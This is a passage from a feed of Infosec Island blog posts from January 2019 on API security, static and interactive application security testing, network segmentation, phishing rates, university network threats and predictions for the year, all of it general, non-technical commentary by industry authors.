Many companies fail to protect their APIs with the same level of security they devote to networks and business-critical applications. As a result, APIs have far reaching security implications for security teams. Case in point: Google, which announced it would be shutting down Google+ because of an API compromise.

The Google experience is just the tip of the iceberg, as companies rarely disclose API attacks. More high-profile API attacks are inevitable as they provide hackers with the keys to the kingdom, giving them numerous avenues for access into corporate data, processes, and operations.

Furthermore, APIs generally contain clear, well-documented details on the inner workings of applications – information that provides hackers with valuable clues on attack vectors they can exploit.

While advances in technology provide many benefits when it comes to digital transformation, they also open new threat vectors and the potential for attacks that can spread quickly over connected ecosystems. Maintaining visibility into traditional and emerging (Orchestration, RPA, API, etc.) IT infrastructures and vulnerabilities associated with them will play a central role in reducing security incidents this year. Identifying and fixing those that pose the highest risk will be even more important.

About the author: Dr. Srinivas Mukkamala, co-founder and CEO of RiskSense, is a recognized expert on artificial intelligence (AI) and neural networks. He holds a patent on Intelligent Agents for Distributed Intrusion Detection System and Method of Practicing.

Copyright 2010 Respective Author at Infosec Island]]>
Strategies for Winning the Application Security Vulnerability Arms Race https://www.infosecisland.com/blogview/25164-Strategies-for-Winning-the-Application-Security-Vulnerability-Arms-Race.html https://www.infosecisland.com/blogview/25164-Strategies-for-Winning-the-Application-Security-Vulnerability-Arms-Race.html Thu, 17 Jan 2019 09:10:49 -0600 As cyber criminals continuously launch more sophisticated attacks, security teams increasingly struggle to keep up with the constant stream of security threats they must investigate and prioritize. When observing companies that have a large web presence (e.g., retail/e-commerce companies), consider the broad threat landscape at play. Web application attacks were responsible for 38 percent of the data breaches examined in the 2018 Verizon Data Breach Investigations Report (DBIR).

To win the vulnerability arms race, security teams need to fight fire with fire by partnering with their own application development teams and enabling them to identify and fix security vulnerabilities in their code earlier in the development process. In doing so, organizations can resolve critical security vulnerabilities before applications move into production, greatly minimizing their risk for costly data breaches.

Catching and resolving vulnerabilities earlier in the software development life cycle (SDLC) makes life a lot easier for security teams further downstream. Shifting left enables security teams to avoid tedious and unnecessary review, greatly reducing their workload and allowing them to focus on the most important security threats to their organizations.

Benefits of shifting left in software development

Various studies from the past decade support the assertion that fixing a software vulnerability earlier in the SDLC is faster, is much less expensive to the organization, and requires fewer resources than fixing a vulnerability in an application that has been released to production.

A 2008 white paper issued by IBM states that “the costs of discovering defects after release are significant: up to 30 times more than if you catch them in the design and architecture phase.” While the white paper was issued a decade ago, this statement is just as significant today.

Obviously, the preferred approach is for developers to resolve security vulnerabilities while they’re coding rather than letting the same fatal issues propagate in countless other places in an application—and then having to return to the lengthy development phases of testing, quality assurance, and final production. Implementing a solution that aligns with development processes allows developers to nip vulnerabilities in the bud as they code, and creates a positive habit that is quick and painless.

Potential software security obstacles

If the solution is so obvious, then why aren’t more development organizations doing it?

  1. Development teams often lack security expertise, and security teams often lack development expertise. Consequently, these teams may feel as if they’re working at cross purposes.
  2. For many years, developers’ highest priority has been to get working software out the door as quickly as possible. If they perceive security testing tools as a roadblock in CI/CD workflows and stringent development schedules, they’ll refuse to adopt them, or they’ll find ways to work around them.

To address these issues, organizations should select the right security tools. These tools should provide developers with technical guidance and educational, contextual support to fix any security vulnerabilities flagged in their code immediately. These tools need to be fast and accurate, fit seamlessly into development workflows, and support developers in producing secure code while also enabling them to hit their release schedules.

What to look for in a static application security testing (SAST) tool

  1. Accuracy. Comprehensive code coverage; accurate identification and prioritization of critical security vulnerabilities to be fixed.
  2. Ease of use. An intuitive, consistent, modern interface involving zero configuration; insight into vulnerabilities with necessary contextual information (e.g., dataflow, CWE vulnerability description, and detailed remediation advice).
  3. Speed. Fast incremental analysis results that appear in seconds as developers write code.
  4. DevSecOps capabilities. Support for popular build servers and issue trackers; flexible APIs for integration into custom tools.
  5. Scalability. Enterprise capabilities to support thousands of projects, developers, and over 10 million issues.
  6. Management-level reporting and compliance to industry standards. Security standards coverage including OWASP Top 10, PCI DSS, and SANS/CWE Top 25; embedded technologies compliance standards coverage including MISRA, AUTOSAR, CERT C / C++, ISO 26262, and ISO/IEC TS 17961.
  7. eLearning integration. Contextual guidance and links to short courses specific to the issues identified in code; just-in-time learning when developers need it.

Security and development teams need to collaborate closely to ensure that enterprise web and mobile applications are free of vulnerabilities that can lead to costly data breaches. Choosing the right development security tool is the first step toward achieving this critical goal.

About the author: Anna Chiang is the Sr. Manager, SAST Product Marketing at Synopsys. She has also held lead roles in application security and platform product management at WhiteHat Security, Perforce Software, and BlackBerry.

Copyright 2010 Respective Author at Infosec Island]]>
2019 Predictions: What Will Be This Year’s Big Trends in Tech? https://www.infosecisland.com/blogview/25162-2019-Predictions-What-Will-Be-This-Years-Big-Trends-in-Tech.html https://www.infosecisland.com/blogview/25162-2019-Predictions-What-Will-Be-This-Years-Big-Trends-in-Tech.html Wed, 16 Jan 2019 09:32:00 -0600 2018 was a year that saw major developments in machine learning, artificial intelligence and the Internet of Things, along with some of the largest scale data breaches to date. What will 2019 bring, and how can businesses prepare themselves for the technological developments to come over the next twelve months?

Data security 

More than any other year, 2018 has cemented the importance of keeping data secure online, with many high-profile breaches such as British Airways, Marriott Hotels and Ticketmaster hitting the headlines. 

But despite these breaches, the worrying trend of insecurely storing massive amounts of personal data online is showing no signs of slowing down. As such, cyber criminals will continue to look for ways to exploit data in any way they can: committing fraud, theft or using it to craft highly targeted attacks. With people beginning to grow conscious of the digital footprint they are leaving behind, it’s likely that we’ll start to see data security being taken far more seriously by businesses over the next year.

This will have a significant impact on larger organisations, who will need to look beyond securing their perimeters and ensure that their networks are robust, especially as these become a more popular attack vector amongst cyber criminals due to the increasing amount of network vulnerabilities. 

Organisations will need to bear in mind that implementing firewalls and securing endpoints are no longer enough to stay secure against evolving threats, and that they will instead need to focus on ensuring they have a robust and thorough security strategy that can handle the complexities of the modern cyber security landscape.

Ethics & legislation

Data, and the legislation that governs it, will continue to be an ongoing source of discussion – and one that could ultimately affect how we interact with technology in the years to come.

With the landmark General Data Protection Regulation (GDPR) coming into force last year, we should soon see the impact that this will have on organisations, who will be challenged on their data processing and protection procedures. The next twelve months will likely see the first organisations face the penalties that go along with falling foul of GDPR, and organisations would be wise to investigate their own data handling now before it becomes too late.

With many businesses continuing to embrace cutting-edge technologies such as artificial intelligence and machine learning, we will also start to explore the implications of these when it comes to data protection, with updates to existing legislation likely to be required to keep up with the rapid pace of development across businesses.

IoT and AI 

Despite the many advancements made in the world of artificial intelligence over the last year, the technology is still very much in its infancy. With many still sceptical of the scope and usefulness of AI, 2019 will serve to be an important year for exploring its possibilities, along with investigating how it could impact our daily and working lives, particularly when it comes to data handling, cloud technologies and smart home devices.

To sustain the growth of AI, the technology will need to work efficiently alongside IoT devices in order to rapidly process growing swathes of data. The interaction between the two will serve as an interesting case study for their utility over the coming year, and should see major developments and acceptance in the wider working world.

Data will continue to be a crucial consideration for businesses over the coming year, intertwining with many technological advancements, and proving to be a source of ethical and legislative interest. Although it’s impossible to predict exactly what might happen over the next twelve months, we can be sure that data will be the focus of many discussions when it comes to security and emerging technologies in 2019.

About the author: Matt Johnson is Chief Technology Officer at Intercity Technology. With over 25 years’ business and technical experience in providing IT solutions, Matt’s expertise covers the design, implementation, support and management of complex communications networks.

Copyright 2010 Respective Author at Infosec Island]]>
Taking Advantage of Network Segmentation in 2019 https://www.infosecisland.com/blogview/25163-Taking-Advantage-of-Network-Segmentation-in-2019.html https://www.infosecisland.com/blogview/25163-Taking-Advantage-of-Network-Segmentation-in-2019.html Wed, 16 Jan 2019 06:52:56 -0600 Overview

Security is and will always be top of mind within organizations as they plan out the year ahead. One method of defense that always deserves attention is network segmentation.

In the event of a cyberattack, segmented networks will confine the attack to a specific zone – and by doing so, contain its impact by preventing attackers from exploiting their initial access to move deeper into the network. By segmenting your network and applying strong access controls for each zone, you isolate any attack and prevent damage before it can start.

But today, in 2019, enterprise networks are no longer just networks. They are a patchwork of traditional networks, software-defined-networks, cloud services and microservices. Segmenting this hybrid conglomerate requires an updated approach.

In this article, I will review exactly how your organization can get started with network segmentation – including some potential issues to plan for and successfully avoid.

Getting Started

Organizations seeking a starting point typically find that designating rudimentary network zones is the most successful approach. Start with simple zones to begin segmentation, even for today’s more complex hybrid networks. Initial zones typically include Internal, External, Internet, and DMZ. Further refinements to segments and access policies can be made to these initial zones, ultimately resulting in an acceptable policy.

Solidify Your Security Policy

Organizations need a standard policy for allowable ports and protocols between zones. This needs to be fully documented and in a format that can be quickly accessed and reviewed – not something unofficial that’s stuck in the head of your IT security manager. Once security policy is transcribed and centralized in a single place, each modification to access policies can be made consistently and confidently.

As your segmentation initiative continues, take the opportunity to consider segmenting the network even further using user identity and application controls.

Restrict Egress

Most likely, your network is already infected and even if it isn’t, it’s a good practice to assume so. Completely preventing malware in your network is practically impossible. But luckily there's another mitigation that is easier. If you limit egress (outbound) connectivity to only what is needed, you can prevent malware from calling back home and from uploading stolen data.

Traditional Networks, the Cloud, and Beyond

As your network expands into the cloud you may need to partner with application teams. If your organization is moving to the cloud in a “lift and shift” approach, your cloud networks are probably considered an extension of your on-premise network and the traditional segmentation architecture will be applied. Organizations that are already doing “cloud native” operations (characterized by DevOps and CI/CD processes) take a different approach. They architect their cloud around applications rather than networks. In this case, the cloud will be owned by the relevant application team and, in the event of a security incident, you will need to work closely with them to contain the breach.

This exercise often results in two or more teams becoming united around a unified goal – while also providing an opportunity to improve the network’s connectivity and security. When you identify parts of the network you are responsible for segmenting, you will also want to include any anticipated networks that may be adopted or merged with your existing network. Understanding that these changes will introduce new security concerns and obstacles, you can better plan for the overall impact on your network segmentation strategy.

Make It Manageable

Parallel to ongoing changes in networking platforms are changes to network policy. This year, your organization may undertake a cloud-first initiative, launch new businesses, or open new locations across the globe – and you need to be ready for it.

Regardless of what changes in your network, there needs to be consistency over managing and tracking these changes. Identifying tools that have previously been configured on your network or are currently used to manage your network makes managing your segmentation process achievable from the start. If you identify multiple existing solutions, consider whether you can integrate them to create a central console for designing, implementing and managing ongoing segmentation.

Implement In Phases

Once you’ve reached this point in the segmentation process, you should know which resources are available and who can contribute to segmentation design and implementation. Armed with this knowledge, you should now set priorities.

First and foremost, assess the network at a high-level and consider what zones you will want to appoint (regardless of how rudimentary it seems). Even segmenting the network in half will provide you with greater management over connectivity, increase visibility over access and identify risks associated with existing access rules that you may have previously missed.

Starting with the initial four zones from above, you can identify further connectivity restrictions and prioritize which of the zones needs to be further segmented (e.g., sensitive data, cyber assets, etc.).

If you are required to comply with specific industry regulations, start by designating a sensitive data zone (for example, a zone for PCI DSS systems and data). You can begin with compliance in mind and then take a step back to approach the broader network. This approach will help you identify connectivity improvements, reduce access permissions, and complicate potential attacks on sensitive data.

Microsegmentation

When you start applying security, you apply it at the macro-level: zones, subnets, vlans, etc. As you make progress in your security journey, you can consider the micro as well. Modern architectures such as SDN, cloud platforms and Kubernetes microservices provide flexible methods to develop individual access control for applications in a security-first mentality (which is commonly referred to as micro-segmentation). Restricting connectivity per application gives you greater control with more specific whitelists and easier identification of abnormal behavior. To do this effectively you will need to involve application owners.

Don’t Do Too Much, Too Soon

Remember to segment in a gradual, deliberate progression as implementing such detailed control in your network can become unmanageable due to the sheer volume of segments.

When implementing network segmentation, it very important to avoid over-segmenting, as this may result in a loss of manageability due to increased complexity.  While segmentation improves overall compliance and security, organizations should segment incrementally in order to maintain manageability and avoid overcomplicating the network.  

Taking on too much, too soon – or moving to micro- or nano- segmentation from the beginning – can create an “analysis paralysis” situation, where the team is quickly overwhelmed and the promise of network segmentation is lost.

An example of doing too much could be assigning a security zone for every application in a 500-application environment. If every zone is individually customized, the sheer volume of network rules can overwhelm an organization, leaving your organization less secure.

Take Action

As anyone who’s worked a day in security knows, automated solutions can send an overwhelming number of alerts. Network Security Policy Management (NSPM) solutions can alleviate this alert fatigue. Violations to security policy can be reviewed to determine if they are allowable exceptions to the policy or require changes in order to comply. Beyond compliance with policy, NSPM solutions can assess whether access violations followed approved exception procedures or not.

Security professionals are often targeted by attackers. NSPM solutions can also be used to determine if network violations are the result of attackers using compromised credentials to grant themselves access to sensitive data.

Never Rest

The proper approach to network segmentation is to never say “completed.” Every network is subject to change – and so are the access controls governing connectivity. A continuous stepwise approach is best. Using NSPM, with each step, you have the opportunity to review, revise, and continue the momentum towards optimal segmentation. 

About the author: Reuven Harrison is CTO and Co-Founder of Tufin. He led all development efforts during the company’s initial fast-paced growth period, and is focused on Tufin’s product leadership. Reuven is responsible for the company’s future vision, product innovation and market strategy. Under Reuven’s leadership, Tufin’s products have received numerous technology awards and wide industry recognition.

Copyright 2010 Respective Author at Infosec Island]]>
Why Zero Tolerance Is the Future for Phishing https://www.infosecisland.com/blogview/25158-Why-Zero-Tolerance-Is-the-Future-for-Phishing.html https://www.infosecisland.com/blogview/25158-Why-Zero-Tolerance-Is-the-Future-for-Phishing.html Wed, 09 Jan 2019 11:20:16 -0600 Our Testing Data Shows You’re Letting Me Hack You Every Time

Phishing just doesn’t get the love it deserves in the security community. It doesn’t get the headlines, security staff time, or dedicated attention that other, more flashy threat vectors get. Certainly, high-impact malware variants that sweep the globe, get their own cool logos and catchy names command respect. But at the end of the day, phishing attacks are really the ones that bring most organizations to their knees and are at the very start of some of the most devastating cyberattacks.

From my experience as a penetration tester and social engineer, it seems that most customers view phishing campaigns as a requirement to deal with once a year, with some high-performing companies tossing in additional computer-based training. In most instances, this type of testing is just one mandatory component of an annual compliance test like FedRAMP, which means, in effect, that the enterprise hasn’t tested their phishing defenses since the last time an audit was performed. Yet the numbers tell an alarming story: phishing has been shown to be the first step in over 90% of recorded breaches. It is a formidable threat to every organization and typically not addressed adequately in cybersecurity strategies.

As security professionals, we are commonly asked “what is an acceptable failure rate for phishing?” (FedRAMP and other certifications address acceptable failure rates as well.) For years, the prevailing sentiment and some professional guidance has been that anything under 10% would be trending in the right direction. While this guidance is, in my view, misguided, many industry professionals and consultancies have given out the same improper (or perhaps we should say “very outdated”) guidance, however well intentioned.

We have gathered three years of phishing test data from multiple phishing campaigns launched at some of the top Fortune 500 companies all the way down to sole proprietorships. From the data, one metric stands above all the others: 62.5% compromise rate. We have tested over 100 companies that have, in their opinion, “stellar phishing programs,” those that have a single campaign once a year, and those that do relatively nothing from year to year. While the quality of phishing testing programs has a broad range, the fact of the matter is, if a person clicks on a phishing email link (and 26.2% do, on average, in our data), there is a 62.5% percent chance on average that person is either going to download a payload that will give the malicious actor control of the host, or that person will share working credentials to their account. While there are security measures that can help to a degree, the metrics are clear—even if the threat actor doesn’t compromise your host, over half the time an active username and password is now in the hands of a malicious actor.

These results should be a significant wake-up call for every organization. Using the “old” acceptable rate of a 10% click through, that leaves a 6% compromise rate. Let’s look at what that might look like for a large enterprise with, say, 50,000 employees. A 26.2% click rate equals 13,100 clicks. If this company were to fall into the “average” compromise rate, that would be 8,187 compromises! Even the industry-standard 10% click rate would yield 3,125 compromises. 

I believe that companies should be striving for zero clicks. While this may well be unattainable, we as humans tend to be complacent in coming close to our goals. A goal of 10% will likely mean 12%. A goal of 2% will likely achieve a result of 5%, and with a 62.5% compromise rate, will still likely open the enterprise network to an unacceptable level of risk. Granting not only the important role phishing plays as an entryway to significant breaches but the likelihood of compromise per click, the industry should be shouting “Zero Tolerance” for all to hear. The days of acceptable risk should be over.

We are unlikely to eliminate the human element and the risks that brings. There will always be mistakes or issues as long as humans are involved. But by setting far more aggressive goals and standing up progressively better phishing testing programs to train employees, reward them for improvement, incentivize them for doing the right thing, and demonstrate what “good” looks like, enterprises can both set and meet more aggressive targets to better protect the organization.

While phishing isn’t the most interesting, headline-worthy topic in cyber news today, it should be a top concern when relating to cybersecurity in nearly every company. The cultural norm needs to shift to zero tolerance, and until it does, as a social engineer and fake criminal by day, I would like to thank you. Every single phishing campaign I run is going to provide me access to your system. You are making access to your company so very easy.

About the author: Gary De Mercurio is senior consultant for the Labs group at Coalfire, a provider of cybersecurity advisory and assessment services.

Copyright 2010 Respective Author at Infosec Island]]>
Universities Beware! The Biggest Security Threats Come from Within the Network https://www.infosecisland.com/blogview/25160-Universities-Beware-The-Biggest-Security-Threats-Come-from-Within-the-Network.html https://www.infosecisland.com/blogview/25160-Universities-Beware-The-Biggest-Security-Threats-Come-from-Within-the-Network.html Tue, 08 Jan 2019 07:09:15 -0600 Higher Education networks have become incredibly complex. Long gone are the days where students connected desktop computers to ethernet cables in their dorm rooms for internet. Now students can access the school’s wireless network at anytime from anywhere and often bring four or more devices with them on campus. Expecting to use their smartphones and gaming consoles for both school related and personal matters, they rely on constant internet connectivity.

While the latest technology streamlines processes and makes the learning experience more efficient, higher education institutions’ networks have not kept up with technology and cyber security requirements. Network security threats have become more common, and according to a recent Infoblox study, 81 percent of IT professionals state securing campus networks has become more challenging in the last two years.

Nevertheless, outside threats aren’t posing the biggest challenges, internal threats are.

More devices, more malware

IT administrators at universities have seen a surge in the number of devices connected to company networks, making the network more vulnerable to cyberattacks. Innovation in personal technology has played a large role in this. Students are bringing a surplus of devices with them to school beyond laptops like smartphones and tablets. For example, an Infoblox study found that students now use tablets (61%), smartwatches (27%) and gaming consoles (25%) on campus.

This spike in devices directly impacts universities network activity. Where a few years ago IT administrators only had to worry about managing the school’s devices, and potentially student and faculty laptops, that is no longer the case. The survey found that 60 percent of faculty, students and IT professionals use four or more devices on the campus network. This has made managing network activity incredibly complex, and has increased the risk of cyberthreat. Devices that are not native to the university network often do not maintain the same security standards that IT administrators are accustomed to.

Outdated security best practices

IT improvements have not been able to keep pace with the rate at which network activity is changing, making their networks an easy target for hackers and DDoS attacks. When devices using the university network are not properly secured, hackers can take advantage of this by breaking into the device, accessing the network and wreaking havoc that can cost universities millions of dollars.

For example, Infoblox’s survey found that 60 percent of faculty haven’t made network security changes in two years. In addition to not making updates to security best practices, 57 percent use outdated security measures like only updating passwords as a security precaution. Poor security practices also make it easier for hackers to compromise network infrastructure and access sensitive information.

A complex cybersecurity strategy that involves network protection can help to combat these types of attacks, but only 52 percent of current network management solutions have DNS provisioning capabilities and can provide remote network access control. This technique plays a critical role in identifying unusual activity on the network.

Lack of security awareness

Additionally, college students and faculty alike are not up to speed with the latest cybersecurity best practices and often make poor decisions that ultimately compromise network security. Thirty nine percent of IT administrators say users aren’t educated enough on security risks, which makes managing the network more challenging. Students are also unaware of the risks IoT devices can pose to the overall health of the network and don’t have the security knowledge to understand the nuances. For example, 54 percent of IT administrators say at least 25 percent of student’s devices come onto campus already infected with malware.

College students are known to be reckless when it comes to partying, but it appears this mindsight has also influenced their approach to cybersecurity. Infoblox’s survey also found that one in three college students have heard of other students implementing malware or making malicious attacks on the school’s network. Students clearly have little regard for how their network usage can impact the network, making the job of the IT administrator extremely difficult.

Conclusion

For better network security at higher education institutions, change needs to begin from within. The IT department needs to implement a next level network security strategy that can thwart the ongoing threat of DDoS attacks. Students and faculty need to be educated on security best practices when using devices on the university network. In the age of the Internet of Things, the number of internet connected devices connecting to the campus network will only increase, and the network needs to be fortified to support this influx from both a performance and security standpoint.

About the author: Victor Danevich is the CTO of Infoblox where he helps customers achieve Next Level Networking via hyper-scalability, implementing automation, and improving network availability with solutions that are built with security from the core.

Copyright 2010 Respective Author at Infosec Island]]>
IAST Technology Is Revolutionizing Sensitive Data Security https://www.infosecisland.com/blogview/25159-IAST-Technology-Is-Revolutionizing-Sensitive-Data-Security.html https://www.infosecisland.com/blogview/25159-IAST-Technology-Is-Revolutionizing-Sensitive-Data-Security.html Tue, 08 Jan 2019 06:55:00 -0600 Unauthorized access to sensitive data, also known as sensitive data leakage, is a pervasive problem affecting even those brands that are widely recognized as having some of the world’s most mature software security initiatives, including Instagram and Amazon. Sensitive data can include financial data such as bank account information, personally identifiable information (PII), and protected health information (i.e., information that can be linked to a specific individual relating to their health status, provision, or payment).

If an organization suffers a sensitive data breach, they’re expected to notify authorities to disclose the breach. For example, per GDPR, the breached firm is expected to disclose the breach within 72 hours of discovery. Such an incident can result in damage to the brand, marred customer trust leading to lost business, regulatory penalties, and the organization funding the investigation into how the leak happened. Data breaches may even lead to lawsuits. As you can see, such an incident could be incredibly detrimental to the future of an organization. There are a variety of regulations in place globally that emphasize the importance of protecting data that is sensitive in nature. So, why then are we still seeing this issue persist?

While we tend to only hear about the massive brands suffering a breach in the news, it’s not only these giant enterprises that are at risk. In fact, small- and medium-sized firms are equally, if not more, susceptible to sensitive data leakage concerns. While the payoff for an attacker isn’t as grand, smaller companies are less likely to have strategies in place to detect, prevent, and mitigate vulnerabilities leading to a breach.

To avoid a sensitive data leak leading to a breach, firms of all sizes need to pay attention to cyber security. Firms often build their own applications, and almost always rely on pre-existing applications to run their business.

If you build your own applications, test them extensively for security. With interactive application security testing (IAST), you can perform application security testing during functional testing. You don’t really need to hire experts to perform vulnerability assessment when you have IAST.

IAST solutions help organizations identify and manage security risks associated with vulnerabilities discovered in running web applications using dynamic testing (a.k.a., runtime testing) techniques. IAST works through software instrumentation, or the use of instruments to monitor an application as it runs and gather information about what it does and how it performs. 

Considering that 84 percent of all cyber-attacks are happening in the application layer, take an inventory of the data relating to your organization’s applications. Develop policies around it. For instance, consider how long to keep the data, the type of data you’re storing, and who requires access to that data. Don’t store data you don’t need as a business. Keep information only as long as necessary. Enforce data retention policies. Put authorization and access controls in place around that data. Protect passwords properly. And, train employees on how to handle this data.

While it’s simple to recommend that firms should be taking an inventory of the data being processed by organizational applications, that is, in reality, a massive undertaking. Where do you even start?

IAST not only identifies vulnerabilities, but verifies them as well. When working with traditional application security testing tools, high false positive rate is a common problem. IAST technology’s verification engine helps firms understand which vulnerabilities to resolve first and minimizes false positives.

Sensitive data in web applications can be monitored through IAST, thus providing a solution to the data leakage problem. IAST monitors web application behavior, including code, memory, and data flow to determine where sensitive data is going, whether it’s being written in a file in an unprotected manner, if it’s exposed in the URL, and if proper encryption is being used. If sensitive data isn’t being handled properly, the IAST tool will flag the instance. There is no manual searching for sensitive data. IAST tooling intelligence detects it on behalf of the application owner—who can also alter the rules to fine tune their goals.

It’s also important to note that applications are built from many components: third party components, proprietary code, and open source components. Think of it like Legos. Any one (or more) of the pieces could be vulnerable. This is why, when testing your applications, it’s critical to fully test all three of these areas.

And we can’t forget implications relating to increasing cloud popularity. With the growing adoption of cloud, more and more sensitive data is being stored out of network perimeters. This increases the risk as well as the attack surface. Also increasing are the regulatory pressures and the need to deliver more with fewer resources in the shortest time possible. Under these circumstances, IAST is the most optimal way to test for application security, sensitive data leakage, and prevent breaches.

About the author: Asma Zubair is the Sr. Manager, IAST Product Management at Synopsys. As a seasoned security product management leader, she has also lead teams at WhiteHat Security, The Find (Facebook) and Yahoo!

Copyright 2010 Respective Author at Infosec Island]]>